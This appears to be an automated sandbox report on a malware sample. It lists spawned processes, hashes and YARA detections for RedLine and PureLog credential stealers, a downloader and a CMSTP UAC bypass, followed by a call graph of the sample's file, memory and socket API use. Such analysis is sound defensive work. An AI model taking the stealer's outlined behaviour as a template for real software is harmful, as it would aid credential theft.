                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                            Start time:09:43:24
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                            Start time:11:34:44
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user~1\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                                                                                                                                                                                                            Imagebase:0x256544c0000
                                                                                                                                                                                                                                            File size:59'721'128 bytes
                                                                                                                                                                                                                                            MD5 hash:8E9C467EAC35B35DA1F586014F29C330
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000000.1530072053.00000256544FB000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                            Start time:11:34:55
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            Imagebase:0x210000
                                                                                                                                                                                                                                            File size:262'432 bytes
                                                                                                                                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2498896890.00000000006CB000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2522072387.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                            Start time:11:34:57
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 2020
                                                                                                                                                                                                                                            Imagebase:0x230000
                                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                            Start time:11:35:05
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe"
                                                                                                                                                                                                                                            Imagebase:0x890000
                                                                                                                                                                                                                                            File size:2'469'936 bytes
                                                                                                                                                                                                                                            MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.1802561648.0000000003DE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                            Start time:11:35:06
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Imagebase:0x410000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.2050713251.00000000054D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                            Start time:11:35:06
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                            Start time:11:35:27
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            Imagebase:0xd40000
                                                                                                                                                                                                                                            File size:262'432 bytes
                                                                                                                                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:5.2%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                                                                                                                              Signature Coverage:11.3%
                                                                                                                                                                                                                                              Total number of Nodes:1122
                                                                                                                                                                                                                                              Total number of Limit Nodes:15
                                                                                                                                                                                                                                              execution_graph 44527 408273 44528 40828f 44527->44528 44530 40831c std::_Xfsopen 29 API calls 44528->44530 44532 4082ce 44528->44532 44536 4082db 44528->44536 44530->44532 44535 4082d5 44532->44535 44537 40831c 44532->44537 44535->44536 44543 40e228 44535->44543 44556 411d32 44537->44556 44539 4082ee 44539->44536 44540 4106ef 44539->44540 44617 41049b 44540->44617 44542 410705 44542->44535 44544 40e234 ___BuildCatchObject 44543->44544 44545 40e245 44544->44545 44546 40e25a 44544->44546 44715 412381 20 API calls __Strcoll 44545->44715 44555 40e255 _Xfiopen __wsopen_s 44546->44555 44698 40e81d EnterCriticalSection 44546->44698 44548 40e24a 44716 410905 26 API calls _Deallocate 44548->44716 44551 40e276 44699 40e1b2 44551->44699 44553 40e281 44717 40e29e LeaveCriticalSection __fread_nolock 44553->44717 44555->44536 44559 411c71 ___BuildCatchObject 44556->44559 44557 411c8b 44581 412381 20 API calls __Strcoll 44557->44581 44559->44557 44561 411cb8 44559->44561 44560 411c90 44582 410905 26 API calls _Deallocate 44560->44582 44563 411cca 44561->44563 44564 411cbd 44561->44564 44573 416499 44563->44573 44583 412381 20 API calls __Strcoll 44564->44583 44567 411cd3 44568 411ce7 std::_Xfsopen 44567->44568 44569 411cda 44567->44569 44585 411d1b LeaveCriticalSection __fread_nolock _Xfiopen 44568->44585 44584 412381 20 API calls __Strcoll 44569->44584 44571 411c9b __wsopen_s 44571->44539 44574 4164a5 ___BuildCatchObject 44573->44574 44586 411a06 EnterCriticalSection 44574->44586 44576 4164b3 44587 416533 44576->44587 44580 4164e4 __wsopen_s 44580->44567 44581->44560 44582->44571 44583->44571 44584->44571 44585->44571 44586->44576 44595 416556 44587->44595 44588 4164c0 44601 4164ef 44588->44601 44589 4165af 44606 41704e 20 API calls 3 library calls 44589->44606 44591 4165b8 44607 41629a 44591->44607 44594 4165c1 44594->44588 44613 4175b5 11 API calls 2 library calls 44594->44613 44595->44588 44595->44589 44604 40e81d EnterCriticalSection 44595->44604 44605 40e831 LeaveCriticalSection 44595->44605 44598 4165e0 44614 40e81d EnterCriticalSection 44598->44614 44600 4165f3 44600->44588 44616 411a4e LeaveCriticalSection 44601->44616 44603 4164f6 44603->44580 44604->44595 44605->44595 44606->44591 44608 4162ce _free 44607->44608 44609 4162a5 RtlFreeHeap 44607->44609 44608->44594 44609->44608 44610 4162ba 44609->44610 44615 412381 20 API calls __Strcoll 44610->44615 44612 4162c0 GetLastError 44612->44608 44613->44598 44614->44600 44615->44612 44616->44603 44619 4104a7 ___BuildCatchObject 44617->44619 44618 4104b3 44642 412381 20 API calls __Strcoll 44618->44642 44619->44618 44621 4104d9 44619->44621 44630 40e81d EnterCriticalSection 44621->44630 44623 4104b8 44643 410905 26 API calls _Deallocate 44623->44643 44624 4104e5 44631 4105fb 44624->44631 44627 4104f9 44644 410518 LeaveCriticalSection __fread_nolock 44627->44644 44629 4104c3 __wsopen_s 44629->44542 44630->44624 44632 41061d 44631->44632 44633 41060d 44631->44633 44645 410522 44632->44645 44658 412381 20 API calls __Strcoll 44633->44658 44636 410612 44636->44627 44637 410640 _Xfiopen 44641 4106bf 44637->44641 44649 40dfcb 44637->44649 44641->44627 44642->44623 44643->44629 44644->44629 44646 410535 44645->44646 44648 41052e _Xfiopen 44645->44648 44647 419800 __fread_nolock 28 API calls 44646->44647 44646->44648 44647->44648 44648->44637 44650 40dfe3 44649->44650 44654 40dfdf 44649->44654 44650->44654 44659 4154e8 44650->44659 44652 40e003 44666 415fa3 62 API calls 5 library calls 44652->44666 44655 419800 44654->44655 44669 419767 44655->44669 44658->44636 44660 4154f4 44659->44660 44661 415509 44659->44661 44667 412381 20 API calls __Strcoll 44660->44667 44661->44652 44663 4154f9 44668 410905 26 API calls _Deallocate 44663->44668 44665 415504 44665->44652 44666->44654 44667->44663 44668->44665 44678 41e97a 44669->44678 44671 419779 44672 419781 44671->44672 44673 419792 SetFilePointerEx 44671->44673 44691 412381 20 API calls __Strcoll 44672->44691 44674 4197aa GetLastError 44673->44674 44677 419786 44673->44677 44692 41234b 20 API calls 3 library calls 44674->44692 44677->44641 44679 41e987 44678->44679 44680 41e99c 44678->44680 44693 41236e 20 API calls __Strcoll 44679->44693 44685 41e9c1 44680->44685 44695 41236e 20 API calls __Strcoll 44680->44695 44682 41e98c 44694 412381 20 API calls __Strcoll 44682->44694 44685->44671 44686 41e9cc 44696 412381 20 API calls __Strcoll 44686->44696 44688 41e994 44688->44671 44689 41e9d4 44697 410905 26 API calls _Deallocate 44689->44697 44691->44677 44692->44677 44693->44682 44694->44688 44695->44686 44696->44689 44697->44688 44698->44551 44700 40e1d4 44699->44700 44701 40e1bf 44699->44701 44703 40dfcb _Xfiopen 62 API calls 44700->44703 44708 40e1cf _Xfiopen 44700->44708 44737 412381 20 API calls __Strcoll 44701->44737 44705 40e1e8 44703->44705 44704 40e1c4 44738 410905 26 API calls _Deallocate 44704->44738 44718 4165f6 44705->44718 44708->44553 44710 4154e8 __fread_nolock 26 API calls 44711 40e1f6 44710->44711 44722 41637e 44711->44722 44714 41629a _free 20 API calls 44714->44708 44715->44548 44716->44555 44717->44555 44719 40e1f0 44718->44719 44720 41660c 44718->44720 44719->44710 44720->44719 44721 41629a _free 20 API calls 44720->44721 44721->44719 44723 4163a2 44722->44723 44724 41638d 44722->44724 44726 4163dd 44723->44726 44729 4163c9 44723->44729 44742 41236e 20 API calls __Strcoll 44724->44742 44744 41236e 20 API calls __Strcoll 44726->44744 44728 416392 44743 412381 20 API calls __Strcoll 44728->44743 44739 416356 44729->44739 44730 4163e2 44745 412381 20 API calls __Strcoll 44730->44745 44734 40e1fc 44734->44708 44734->44714 44735 4163ea 44746 410905 26 API calls _Deallocate 44735->44746 44737->44704 44738->44708 44747 4162d4 44739->44747 44741 41637a 44741->44734 44742->44728 44743->44734 44744->44730 44745->44735 44746->44734 44748 4162e0 ___BuildCatchObject 44747->44748 44758 41e6fd EnterCriticalSection 44748->44758 44750 4162ee 44751 416320 44750->44751 44752 416315 44750->44752 44774 412381 20 API calls __Strcoll 44751->44774 44759 4163fd 44752->44759 44755 41631b 44775 41634a LeaveCriticalSection __wsopen_s 44755->44775 44757 41633d __wsopen_s 44757->44741 44758->44750 44760 41e97a __wsopen_s 26 API calls 44759->44760 44761 41640d 44760->44761 44762 416413 44761->44762 44764 416445 44761->44764 44765 41e97a __wsopen_s 26 API calls 44761->44765 44776 41e8e9 21 API calls 3 library calls 44762->44776 44764->44762 44766 41e97a __wsopen_s 26 API calls 44764->44766 44768 41643c 44765->44768 44769 416451 FindCloseChangeNotification 44766->44769 44767 41646b 44770 41648d 44767->44770 44777 41234b 20 API calls 3 library calls 44767->44777 44771 41e97a __wsopen_s 26 API calls 44768->44771 44769->44762 44772 41645d GetLastError 44769->44772 44770->44755 44771->44764 44772->44762 44774->44755 44775->44757 44776->44767 44777->44770 44778 416ec2 44779 416ecf 44778->44779 44783 416ee7 44778->44783 44828 412381 20 API calls __Strcoll 44779->44828 44781 416ed4 44829 410905 26 API calls _Deallocate 44781->44829 44784 416f42 44783->44784 44790 416edf 44783->44790 44830 418c55 21 API calls 2 library calls 44783->44830 44786 4154e8 __fread_nolock 26 API calls 44784->44786 44787 416f5a 44786->44787 44798 41919a 44787->44798 44789 416f61 44789->44790 44791 4154e8 __fread_nolock 26 API calls 44789->44791 44792 416f8d 44791->44792 44792->44790 44793 4154e8 __fread_nolock 26 API calls 44792->44793 44794 416f9b 44793->44794 44794->44790 44795 4154e8 __fread_nolock 26 API calls 44794->44795 44796 416fab 44795->44796 44797 4154e8 __fread_nolock 26 API calls 44796->44797 44797->44790 44799 4191a6 ___BuildCatchObject 44798->44799 44800 4191ae 44799->44800 44804 4191c6 44799->44804 44897 41236e 20 API calls __Strcoll 44800->44897 44801 41928c 44904 41236e 20 API calls __Strcoll 44801->44904 44803 4191b3 44898 412381 20 API calls __Strcoll 44803->44898 44804->44801 44807 4191ff 44804->44807 44809 419223 44807->44809 44810 41920e 44807->44810 44808 419291 44905 412381 20 API calls __Strcoll 44808->44905 44831 41e6fd EnterCriticalSection 44809->44831 44899 41236e 20 API calls __Strcoll 44810->44899 44814 41921b 44906 410905 26 API calls _Deallocate 44814->44906 44815 419213 44900 412381 20 API calls __Strcoll 44815->44900 44816 419229 44820 419245 44816->44820 44821 41925a 44816->44821 44818 4191bb __wsopen_s 44818->44789 44901 412381 20 API calls __Strcoll 44820->44901 44832 4192ad 44821->44832 44824 41924a 44902 41236e 20 API calls __Strcoll 44824->44902 44825 419255 44903 419284 LeaveCriticalSection __wsopen_s 44825->44903 44828->44781 44829->44790 44830->44784 44831->44816 44833 4192d7 44832->44833 44834 4192bf 44832->44834 44836 419641 44833->44836 44841 41931c 44833->44841 44916 41236e 20 API calls __Strcoll 44834->44916 44937 41236e 20 API calls __Strcoll 44836->44937 44837 4192c4 44917 412381 20 API calls __Strcoll 44837->44917 44840 419646 44938 412381 20 API calls __Strcoll 44840->44938 44843 419327 44841->44843 44844 4192cc 44841->44844 44849 419357 44841->44849 44918 41236e 20 API calls __Strcoll 44843->44918 44844->44825 44845 419334 44939 410905 26 API calls _Deallocate 44845->44939 44847 41932c 44919 412381 20 API calls __Strcoll 44847->44919 44851 419370 44849->44851 44852 4193b2 44849->44852 44853 419396 44849->44853 44851->44853 44857 41937d 44851->44857 44923 417a45 44852->44923 44920 41236e 20 API calls __Strcoll 44853->44920 44856 41939b 44921 412381 20 API calls __Strcoll 44856->44921 44907 421229 44857->44907 44861 41629a _free 20 API calls 44866 4193d2 44861->44866 44862 41951b 44864 419591 44862->44864 44867 419534 GetConsoleMode 44862->44867 44863 4193a2 44922 410905 26 API calls _Deallocate 44863->44922 44869 419595 ReadFile 44864->44869 44868 41629a _free 20 API calls 44866->44868 44867->44864 44870 419545 44867->44870 44871 4193d9 44868->44871 44872 419609 GetLastError 44869->44872 44873 4195af 44869->44873 44870->44869 44875 41954b ReadConsoleW 44870->44875 44876 4193e3 44871->44876 44877 4193fe 44871->44877 44878 419616 44872->44878 44879 41956d 44872->44879 44873->44872 44874 419586 44873->44874 44883 4193ad __fread_nolock 44874->44883 44890 4195d4 44874->44890 44891 4195eb 44874->44891 44875->44874 44882 419567 GetLastError 44875->44882 44930 412381 20 API calls __Strcoll 44876->44930 44881 419800 __fread_nolock 28 API calls 44877->44881 44935 412381 20 API calls __Strcoll 44878->44935 44879->44883 44932 41234b 20 API calls 3 library calls 44879->44932 44881->44857 44882->44879 44884 41629a _free 20 API calls 44883->44884 44884->44844 44886 41961b 44936 41236e 20 API calls __Strcoll 44886->44936 44888 4193e8 44931 41236e 20 API calls __Strcoll 44888->44931 44933 418fc9 31 API calls 3 library calls 44890->44933 44891->44883 44894 419602 44891->44894 44934 418e09 29 API calls __fread_nolock 44894->44934 44896 419607 44896->44883 44897->44803 44898->44818 44899->44815 44900->44814 44901->44824 44902->44825 44903->44818 44904->44808 44905->44814 44906->44818 44908 421243 44907->44908 44909 421236 44907->44909 44912 42124f 44908->44912 44941 412381 20 API calls __Strcoll 44908->44941 44940 412381 20 API calls __Strcoll 44909->44940 44911 42123b 44911->44862 44912->44862 44914 421270 44942 410905 26 API calls _Deallocate 44914->44942 44916->44837 44917->44844 44918->44847 44919->44845 44920->44856 44921->44863 44922->44883 44924 417a83 44923->44924 44928 417a53 IsInExceptionSpec 44923->44928 44944 412381 20 API calls __Strcoll 44924->44944 44925 417a6e RtlAllocateHeap 44927 417a81 44925->44927 44925->44928 44927->44861 44928->44924 44928->44925 44943 412ede 7 API calls 2 library calls 44928->44943 44930->44888 44931->44883 44932->44883 44933->44883 44934->44896 44935->44886 44936->44883 44937->44840 44938->44845 44939->44844 44940->44911 44941->44914 44942->44911 44943->44928 44944->44927 44945 43ad12e 44946 43ad13d 44945->44946 44949 43ad8ce 44946->44949 44954 43ad8e9 44949->44954 44950 43ad8f2 CreateToolhelp32Snapshot 44951 43ad90e Module32First 44950->44951 44950->44954 44952 43ad91d 44951->44952 44953 43ad146 44951->44953 44956 43ad58d 44952->44956 44954->44950 44954->44951 44957 43ad5b8 44956->44957 44958 43ad5c9 VirtualAlloc 44957->44958 44959 43ad601 44957->44959 44958->44959 44959->44959 44960 409385 44961 409391 ___BuildCatchObject 44960->44961 44992 40959e 44961->44992 44963 409398 44964 4094eb 44963->44964 44967 4093c2 44963->44967 45093 409a73 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 44964->45093 44966 4094f2 45084 413b51 44966->45084 44979 409401 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 44967->44979 45087 413876 5 API calls CatchGuardHandler 44967->45087 44972 4093db 44974 4093e1 44972->44974 45088 41381a 5 API calls CatchGuardHandler 44972->45088 44976 409462 45003 409b8d 44976->45003 44979->44976 45089 40e677 39 API calls 5 library calls 44979->45089 44993 4095a7 44992->44993 45095 409d1b IsProcessorFeaturePresent 44993->45095 44995 4095b3 45096 40c907 10 API calls 3 library calls 44995->45096 44997 4095b8 45002 4095bc 44997->45002 45097 415329 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 44997->45097 44999 4095c5 45000 4095d3 44999->45000 45098 40c930 8 API calls 3 library calls 44999->45098 45000->44963 45002->44963 45099 40b5a0 45003->45099 45006 409468 45007 4137c7 45006->45007 45101 41e1c1 45007->45101 45009 4137d0 45011 409471 45009->45011 45105 41e4cb 38 API calls 45009->45105 45012 424b3e 45011->45012 45013 424b4e _Xfiopen 45012->45013 45107 401b1e 45013->45107 45015 424b7c 45110 403498 45015->45110 45020 401b1e 27 API calls 45021 424bdc 45020->45021 45117 426354 45021->45117 45024 401b1e 27 API calls 45025 424bf5 GetModuleFileNameA 45024->45025 45026 401b1e 27 API calls 45025->45026 45027 424c1f 45026->45027 45137 425ee2 45027->45137 45029 424c2f 45030 401b1e 27 API calls 45029->45030 45031 4250ca 45030->45031 45156 4034e3 45031->45156 45033 4250f4 45164 426504 45033->45164 45035 425233 45226 42612f 45035->45226 45037 4253f6 45038 401b1e 27 API calls 45037->45038 45039 4255c2 45038->45039 45240 40356f 45039->45240 45041 4255df 45042 426504 64 API calls 45041->45042 45043 425666 45042->45043 45044 426504 64 API calls 45043->45044 45047 425840 ___scrt_fastfail 45044->45047 45045 425e40 45269 4019f8 26 API calls 45045->45269 45047->45045 45248 410c91 45047->45248 45052 42586d 45256 426217 CreateFileA 45052->45256 45056 401b1e 27 API calls 45057 4258a7 45056->45057 45259 426260 45057->45259 45060 4258ac 45061 426504 64 API calls 45060->45061 45062 425ac4 ___scrt_fastfail 45061->45062 45070 425bbf 45062->45070 45266 42631a GetTempPathA 45062->45266 45065 426217 3 API calls 45066 425ba3 45065->45066 45067 401b1e 27 API calls 45066->45067 45066->45070 45068 425bba 45067->45068 45069 426260 29 API calls 45068->45069 45069->45070 45071 426504 64 API calls 45070->45071 45073 425db5 ___scrt_fastfail 45071->45073 45075 410c91 51 API calls 45073->45075 45080 425e1b 45073->45080 45077 425ddf 45075->45077 45078 426217 3 API calls 45077->45078 45079 425dfd 45078->45079 45079->45080 45081 401b1e 27 API calls 45079->45081 45268 4019f8 26 API calls 45080->45268 45082 425e16 45081->45082 45083 426260 29 API calls 45082->45083 45083->45080 45743 4138ce 45084->45743 45087->44972 45088->44979 45089->44976 45093->44966 45095->44995 45096->44997 45097->44999 45098->45002 45100 409ba0 GetStartupInfoW 45099->45100 45100->45006 45102 41e1ca 45101->45102 45103 41e1d3 45101->45103 45106 41e0c0 51 API calls 5 library calls 45102->45106 45103->45009 45105->45009 45106->45103 45270 402c50 45107->45270 45111 4034c0 45110->45111 45112 4034d9 45110->45112 45111->45112 45279 40e509 46 API calls 45111->45279 45114 401b52 45112->45114 45280 402d13 45114->45280 45116 401b68 45116->45020 45118 42635e __EH_prolog 45117->45118 45311 403e0c 45118->45311 45120 426382 45120->45120 45121 402c71 27 API calls 45120->45121 45122 4263e7 45121->45122 45325 404097 45122->45325 45124 426496 45127 4264b2 std::ios_base::_Ios_base_dtor 45124->45127 45342 40387f 26 API calls 2 library calls 45124->45342 45338 402bef 45127->45338 45128 42646e 45131 402c50 27 API calls 45128->45131 45129 402c71 27 API calls 45129->45128 45133 42648e 45131->45133 45135 402bef 26 API calls 45133->45135 45134 402bef 26 API calls 45136 424be8 45134->45136 45135->45124 45136->45024 45138 425eec __EH_prolog 45137->45138 45496 401bb2 45138->45496 45143 425f4b 45512 401a16 45143->45512 45144 425f2f 45533 401b6f 45144->45533 45147 425f58 45515 4024a1 45147->45515 45150 425f42 std::ios_base::_Ios_base_dtor 45150->45029 45154 425fa6 45155 401b6f 68 API calls 45154->45155 45155->45150 45157 4034ed __EH_prolog 45156->45157 45684 401056 45157->45684 45159 403513 45160 401056 50 API calls 45159->45160 45161 403542 45160->45161 45688 40399f 45161->45688 45163 403553 45163->45033 45165 42650e __EH_prolog 45164->45165 45166 401b1e 27 API calls 45165->45166 45167 4268d7 45166->45167 45726 401aa1 45167->45726 45169 4268ed 45170 401aa1 27 API calls 45169->45170 45171 426974 45170->45171 45172 401aa1 27 API calls 45171->45172 45173 426981 45172->45173 45174 401aa1 27 API calls 45173->45174 45175 4269e4 45174->45175 45176 401aa1 27 API calls 45175->45176 45177 4269f5 45176->45177 45178 401aa1 27 API calls 45177->45178 45179 426a02 45178->45179 45180 401aa1 27 API calls 45179->45180 45181 426aad 45180->45181 45182 401aa1 27 API calls 45181->45182 45183 426da4 45182->45183 45184 401aa1 27 API calls 45183->45184 45185 427053 45184->45185 45186 401aa1 27 API calls 45185->45186 45212 427060 45186->45212 45187 42717c 45188 401aa1 27 API calls 45187->45188 45189 427189 WSAStartup 45188->45189 45190 4271a3 socket 45189->45190 45213 4273da 45189->45213 45191 4271d0 45190->45191 45192 4271bb 45190->45192 45194 4271d8 gethostbyname 45191->45194 45193 4271c4 WSACleanup 45192->45193 45195 42758b 45193->45195 45196 4271e9 ctype 45194->45196 45194->45213 45195->45035 45198 4271fc htons connect 45196->45198 45197 42757e WSACleanup closesocket 45197->45195 45199 42722b 45198->45199 45198->45213 45200 42723d send 45199->45200 45201 42724d 45200->45201 45200->45213 45202 427253 send 45201->45202 45208 427269 ___scrt_fastfail 45201->45208 45202->45208 45202->45213 45203 42728f recv 45203->45208 45203->45213 45204 412faf 46 API calls 45204->45208 45205 4273cd 45206 4273d4 45205->45206 45207 427515 45205->45207 45224 4273e9 45205->45224 45206->45213 45206->45224 45209 427535 recv 45207->45209 45207->45213 45208->45203 45208->45204 45208->45205 45208->45213 45731 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 45208->45731 45209->45207 45209->45213 45210 42740d recv 45210->45213 45210->45224 45212->45187 45214 401aa1 27 API calls 45212->45214 45213->45197 45216 42714c 45214->45216 45215 427508 